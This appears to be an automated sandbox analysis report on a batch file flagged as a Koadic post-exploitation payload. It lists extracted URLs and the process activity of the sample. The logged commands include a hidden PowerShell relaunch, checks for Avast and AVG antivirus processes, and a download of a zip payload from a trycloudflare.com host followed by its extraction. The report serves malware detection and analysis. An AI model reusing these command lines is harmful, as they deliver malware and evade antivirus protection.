Source: 3.7.html.24.dr	String found in binary or memory: https://github.com/python/cpython/blob/v3.7.13/.travis.yml
Source: 3.7.html.24.dr, 3.6.html.24.dr	String found in binary or memory: https://github.com/python/cpython/issues/61441
Source: 3.7.html.24.dr, 3.6.html.24.dr	String found in binary or memory: https://github.com/python/cpython/issues/78851
Source: 3.7.html.24.dr, 3.6.html.24.dr, 3.9.html.24.dr, 3.8.html.24.dr	String found in binary or memory: https://github.com/python/cpython/issues/87451
Source: 3.7.html.24.dr, 3.6.html.24.dr, 3.9.html.24.dr	String found in binary or memory: https://github.com/python/cpython/issues/88048
Source: _pylong.py.24.dr	String found in binary or memory: https://github.com/python/cpython/issues/90716
Source: expressions.html.24.dr	String found in binary or memory: https://github.com/python/cpython/tree/3.12/Lib/asyncio/base_events.py
Source: token.html.24.dr	String found in binary or memory: https://github.com/python/cpython/tree/3.12/Lib/token.py
Source: tomllib.html.24.dr	String found in binary or memory: https://github.com/python/cpython/tree/3.12/Lib/tomllib
Source: unittest.mock.html.24.dr	String found in binary or memory: https://github.com/python/cpython/tree/3.12/Lib/unittest/mock.py
Source: urllib.html.24.dr	String found in binary or memory: https://github.com/python/cpython/tree/3.12/Lib/urllib/
Source: xml.dom.html.24.dr	String found in binary or memory: https://github.com/python/cpython/tree/3.12/Lib/xml/dom/__init__.py
Source: xml.etree.elementtree.html.24.dr	String found in binary or memory: https://github.com/python/cpython/tree/3.12/Lib/xml/etree/ElementTree.py
Source: xmlrpc.client.html.24.dr	String found in binary or memory: https://github.com/python/cpython/tree/3.12/Lib/xmlrpc/client.py
Source: 3.7.html.24.dr	String found in binary or memory: https://github.com/python/cpython/tree/3.12/Tools/ssl/multissltests.py
Source: 3.7.html.24.dr	String found in binary or memory: https://importlib-resources.readthedocs.io/en/latest/
Source: 3.1.html.24.dr	String found in binary or memory: https://json.org/
Source: 3.7.html.24.dr	String found in binary or memory: https://mail.python.org/pipermail/python-dev/2017-December/151283.html
Source: time.html.24.dr	String found in binary or memory: https://manpages.debian.org/pthread_getcpuclockid(3)
Source: time.html.24.dr	String found in binary or memory: https://manpages.debian.org/strftime(3)
Source: time.html.24.dr	String found in binary or memory: https://manpages.debian.org/tzfile(5)
Source: powershell.exe, 0000000D.00000002.1819134442.00000242B4732000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1819134442.00000242B45EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: 2.0.html.24.dr, general.html.24.dr	String found in binary or memory: https://peps.python.org/
Source: 2.0.html.24.dr	String found in binary or memory: https://peps.python.org/pep-0001/
Source: expressions.html.24.dr, programming.html.24.dr, controlflow.html.24.dr, editors.html.24.dr	String found in binary or memory: https://peps.python.org/pep-0008/
Source: 3.7.html.24.dr, windows.html2.24.dr	String found in binary or memory: https://peps.python.org/pep-0011/
Source: 2.0.html.24.dr	String found in binary or memory: https://peps.python.org/pep-0100/
Source: 2.0.html.24.dr	String found in binary or memory: https://peps.python.org/pep-0201/
Source: 2.4.html.24.dr	String found in binary or memory: https://peps.python.org/pep-0218/
Source: 2.4.html.24.dr	String found in binary or memory: https://peps.python.org/pep-0237/
Source: expressions.html.24.dr	String found in binary or memory: https://peps.python.org/pep-0255/
Source: 2.4.html.24.dr	String found in binary or memory: https://peps.python.org/pep-0289/
Source: 2.4.html.24.dr	String found in binary or memory: https://peps.python.org/pep-0292/
Source: 3.1.html.24.dr, import.html.24.dr	String found in binary or memory: https://peps.python.org/pep-0302/
Source: expressions.html.24.dr	String found in binary or memory: https://peps.python.org/pep-0308/
Source: 2.4.html.24.dr	String found in binary or memory: https://peps.python.org/pep-0318/
Source: 2.4.html.24.dr	String found in binary or memory: https://peps.python.org/pep-0322/
Source: 2.4.html.24.dr	String found in binary or memory: https://peps.python.org/pep-0324/
Source: 2.4.html.24.dr	String found in binary or memory: https://peps.python.org/pep-0327/
Source: 2.4.html.24.dr, import.html.24.dr	String found in binary or memory: https://peps.python.org/pep-0328/
Source: 2.4.html.24.dr	String found in binary or memory: https://peps.python.org/pep-0331/
Source: expressions.html.24.dr	String found in binary or memory: https://peps.python.org/pep-0342/
Source: 3.1.html.24.dr	String found in binary or memory: https://peps.python.org/pep-0372/
Source: 3.1.html.24.dr	String found in binary or memory: https://peps.python.org/pep-0378/
Source: expressions.html.24.dr	String found in binary or memory: https://peps.python.org/pep-0380/
Source: 3.4.html.24.dr	String found in binary or memory: https://peps.python.org/pep-0428/
Source: 3.4.html.24.dr	String found in binary or memory: https://peps.python.org/pep-0429/
Source: 3.7.html.24.dr	String found in binary or memory: https://peps.python.org/pep-0432/
Source: 3.4.html.24.dr	String found in binary or memory: https://peps.python.org/pep-0435/
Source: 3.4.html.24.dr	String found in binary or memory: https://peps.python.org/pep-0443/
Source: 3.4.html.24.dr	String found in binary or memory: https://peps.python.org/pep-0446/
Source: expressions.html.24.dr	String found in binary or memory: https://peps.python.org/pep-0448/
Source: 3.4.html.24.dr	String found in binary or memory: https://peps.python.org/pep-0450/
Source: 3.4.html.24.dr, import.html.24.dr	String found in binary or memory: https://peps.python.org/pep-0451/
Source: 3.4.html.24.dr	String found in binary or memory: https://peps.python.org/pep-0453/
Source: 3.4.html.24.dr	String found in binary or memory: https://peps.python.org/pep-0454/
Source: time.html.24.dr	String found in binary or memory: https://peps.python.org/pep-0475/
Source: 3.7.html.24.dr	String found in binary or memory: https://peps.python.org/pep-0479/
Source: 3.7.html.24.dr, controlflow.html.24.dr, 3.6.html.24.dr, typing.html.24.dr, 3.8.html.24.dr	String found in binary or memory: https://peps.python.org/pep-0484/
Source: expressions.html.24.dr, 3.6.html.24.dr	String found in binary or memory: https://peps.python.org/pep-0492/
Source: expressions.html.24.dr, 3.6.html.24.dr	String found in binary or memory: https://peps.python.org/pep-0525/
Source: 3.7.html.24.dr, 3.6.html.24.dr, typing.html.24.dr, 3.8.html.24.dr	String found in binary or memory: https://peps.python.org/pep-0526/
Source: expressions.html.24.dr, 3.6.html.24.dr	String found in binary or memory: https://peps.python.org/pep-0530/
Source: 3.7.html.24.dr	String found in binary or memory: https://peps.python.org/pep-0538/
Source: 3.7.html.24.dr, init.html.24.dr	String found in binary or memory: https://peps.python.org/pep-0539/
Source: 3.7.html.24.dr	String found in binary or memory: https://peps.python.org/pep-0540/
Source: 3.7.html.24.dr	String found in binary or memory: https://peps.python.org/pep-0545/
Source: 3.7.html.24.dr	String found in binary or memory: https://peps.python.org/pep-0552/
Source: 3.7.html.24.dr	String found in binary or memory: https://peps.python.org/pep-0553/
Source: 3.7.html.24.dr	String found in binary or memory: https://peps.python.org/pep-0557/
Source: 3.7.html.24.dr	String found in binary or memory: https://peps.python.org/pep-0560/
Source: 3.7.html.24.dr	String found in binary or memory: https://peps.python.org/pep-0562/
Source: 3.7.html.24.dr, typing.html.24.dr	String found in binary or memory: https://peps.python.org/pep-0563/
Source: 3.7.html.24.dr	String found in binary or memory: https://peps.python.org/pep-0564/
Source: 3.7.html.24.dr	String found in binary or memory: https://peps.python.org/pep-0564/#annex-clocks-resolution-in-python
Source: 3.7.html.24.dr	String found in binary or memory: https://peps.python.org/pep-0565/
Source: 3.7.html.24.dr	String found in binary or memory: https://peps.python.org/pep-0567/
Source: expressions.html.24.dr, 3.8.html.24.dr	String found in binary or memory: https://peps.python.org/pep-0572/
Source: sys.html.24.dr, 3.8.html.24.dr	String found in binary or memory: https://peps.python.org/pep-0578/
Source: 3.7.html.24.dr, controlflow.html.24.dr	String found in binary or memory: https://peps.python.org/pep-3107/
Source: 3.1.html.24.dr, 2.6.html.24.dr	String found in binary or memory: https://peps.python.org/pep-3116/
Source: 3.4.html.24.dr	String found in binary or memory: https://peps.python.org/pep-3154/
Source: 3.4.html.24.dr	String found in binary or memory: https://peps.python.org/pep-3156/
Source: reporter.cpython-312.pyc.24.dr	String found in binary or memory: https://pip.pypa.io/warnings/backtracking
Source: unittest.mock.html.24.dr, general.html.24.dr	String found in binary or memory: https://pypi.org
Source: unittest.mock.html.24.dr	String found in binary or memory: https://pypi.org/project/mock
Source: tomllib.html.24.dr	String found in binary or memory: https://pypi.org/project/tomli-w/
Source: tomllib.html.24.dr	String found in binary or memory: https://pypi.org/project/tomlkit/
Source: 2.0.html.24.dr, windows.html2.24.dr	String found in binary or memory: https://pythonce.sourceforge.net/
Source: 2.0.html.24.dr	String found in binary or memory: https://pyxml.sourceforge.net/topics/howto/xml-howto.html
Source: 3.1.html.24.dr	String found in binary or memory: https://pyyaml.org/
Source: 3.7.html.24.dr	String found in binary or memory: https://reproducible-builds.org/
Source: 2.0.html.24.dr	String found in binary or memory: https://sourceforge.net/projects/python/
Source: xmlrpc.client.html.24.dr	String found in binary or memory: https://tldp.org/HOWTO/XML-RPC-HOWTO/index.html
Source: tomllib.html.24.dr	String found in binary or memory: https://toml.io
Source: tomllib.html.24.dr	String found in binary or memory: https://toml.io).
Source: tomllib.html.24.dr	String found in binary or memory: https://toml.io/en/
Source: 3.7.html.24.dr	String found in binary or memory: https://unicode.org/reports/tr18/
Source: xmlrpc.client.html.24.dr	String found in binary or memory: https://web.archive.org/web/20060624230303/http://www.xmlrpc.com/discuss/msgReader$1208?mode=topic
Source: xmlrpc.client.html.24.dr	String found in binary or memory: https://web.archive.org/web/20130120074804/http://ontosys.com/xml-rpc/extensions.php
Source: unittest.mock.html.24.dr	String found in binary or memory: https://web.archive.org/web/20200603181648/http://www.voidspace.org.uk/python/weblog/arch_d7_2010_12
Source: 2.4.html.24.dr	String found in binary or memory: https://wiki.python.org/moin/PythonDecoratorLibrary
Source: xmlrpc.client.html.24.dr	String found in binary or memory: https://ws.apache.org/xmlrpc/types.html
Source: 2.0.html.24.dr	String found in binary or memory: https://www.haskell.org
Source: xml.etree.elementtree.html.24.dr	String found in binary or memory: https://www.iana.org/assignments/character-sets/character-sets.xhtml
Source: time.html.24.dr	String found in binary or memory: https://www.nist.gov/pml/time-and-frequency-division/nist-time-frequently-asked-questions-faq#tai
Source: xml.dom.html.24.dr	String found in binary or memory: https://www.omg.org/spec/PYTH/1.2/PDF
Source: 3.4.html.24.dr, appendix.html.24.dr, unix.html.24.dr, xml.sax.utils.html.24.dr, stdlib.html.24.dr, programming.html.24.dr, controlflow.html.24.dr, windows.html.24.dr, genindex-all.html.24.dr, 3.6.html.24.dr, trace.html.24.dr, extending.html0.24.dr, genindex-C.html.24.dr, typing.html.24.dr, init.html.24.dr, 3.9.html.24.dr, memoryview.html.24.dr, windows.html2.24.dr, index.html3.24.dr, 2.6.html.24.dr, editors.html.24.dr	String found in binary or memory: https://www.python.org/
Source: 2.0.html.24.dr	String found in binary or memory: https://www.python.org/community/sigs/current/xml-sig
Source: 3.7.html.24.dr, 3.1.html.24.dr, expressions.html.24.dr, 2.4.html.24.dr, typehints.html.24.dr, tomllib.html.24.dr, time.html.24.dr, sys.html.24.dr, urllib.html.24.dr, contextvars.html.24.dr, unittest.mock.html.24.dr, bytes.html.24.dr, xmlrpc.client.html.24.dr, iterator.html.24.dr, gcsupport.html.24.dr, xml.etree.elementtree.html.24.dr, token.html.24.dr, 2.0.html.24.dr, xml.dom.html.24.dr, 3.4.html.24.dr, appendix.html.24.dr	String found in binary or memory: https://www.python.org/psf/donations/
Source: 3.7.html.24.dr, 3.1.html.24.dr, expressions.html.24.dr, 2.4.html.24.dr, typehints.html.24.dr, tomllib.html.24.dr, time.html.24.dr, sys.html.24.dr, urllib.html.24.dr, contextvars.html.24.dr, unittest.mock.html.24.dr, bytes.html.24.dr, xmlrpc.client.html.24.dr, iterator.html.24.dr, gcsupport.html.24.dr, xml.etree.elementtree.html.24.dr, token.html.24.dr, 2.0.html.24.dr, xml.dom.html.24.dr, 3.4.html.24.dr, appendix.html.24.dr	String found in binary or memory: https://www.sphinx-doc.org/
Source: 3.7.html.24.dr	String found in binary or memory: https://www.unicode.org/versions/Unicode11.0.0/
Source: xmlrpc.client.html.24.dr	String found in binary or memory: https://xmlrpc-c.sourceforge.net/introspection.html

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49687
Source: unknown	Network traffic detected: HTTP traffic on port 49687 -> 443

Source: unknown

HTTPS traffic detected: 104.16.231.132:443 -> 192.168.2.6:49687 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: yap.bat, type: SAMPLE

Matched rule: Koadic post-exploitation framework BAT payload Author: ditekSHen

Source: yap.bat, type: SAMPLE

Matched rule: MALWARE_BAT_KoadicBAT author = ditekSHen, description = Koadic post-exploitation framework BAT payload

Source: classification engine

Classification label: mal76.phis.evad.winBAT@37/1077@2/2

Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe

File created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.7028

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7000:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1360:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_emdb3ctx.w1q.ps1

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\yap.bat" "

Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVASTUI.EXE'
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVGUI.EXE'

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: yap.bat	Virustotal: Detection: 13%
Source: yap.bat	ReversingLabs: Detection: 16%

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\yap.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "Start-Process cmd -ArgumentList '/c \"C:\Users\user\Desktop\yap.bat\" hidden' -WindowStyle Hidden"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\Desktop\yap.bat" hidden
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\YPSIACHYXW.pdf"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq AvastUI.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i "AvastUI.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i "avgui.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://german-tan-exotic-collectibles.trycloudflare.com/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2096 --field-trial-handle=1568,i,3081941811078344986,2843059504850167928,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { Expand-Archive -Path 'C:\Users\user\Downloads\downloaded.zip' -DestinationPath 'C:\Users\user\Downloads\Extracted' -Force } catch { exit 1 }"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "Start-Process cmd -ArgumentList '/c \"C:\Users\user\Desktop\yap.bat\" hidden' -WindowStyle Hidden"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\Desktop\yap.bat" hidden	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\YPSIACHYXW.pdf"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq AvastUI.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i "AvastUI.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i "avgui.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://german-tan-exotic-collectibles.trycloudflare.com/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { Expand-Archive -Path 'C:\Users\user\Downloads\downloaded.zip' -DestinationPath 'C:\Users\user\Downloads\Extracted' -Force } catch { exit 1 }"	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2096 --field-trial-handle=1568,i,3081941811078344986,2843059504850167928,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\timeout.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
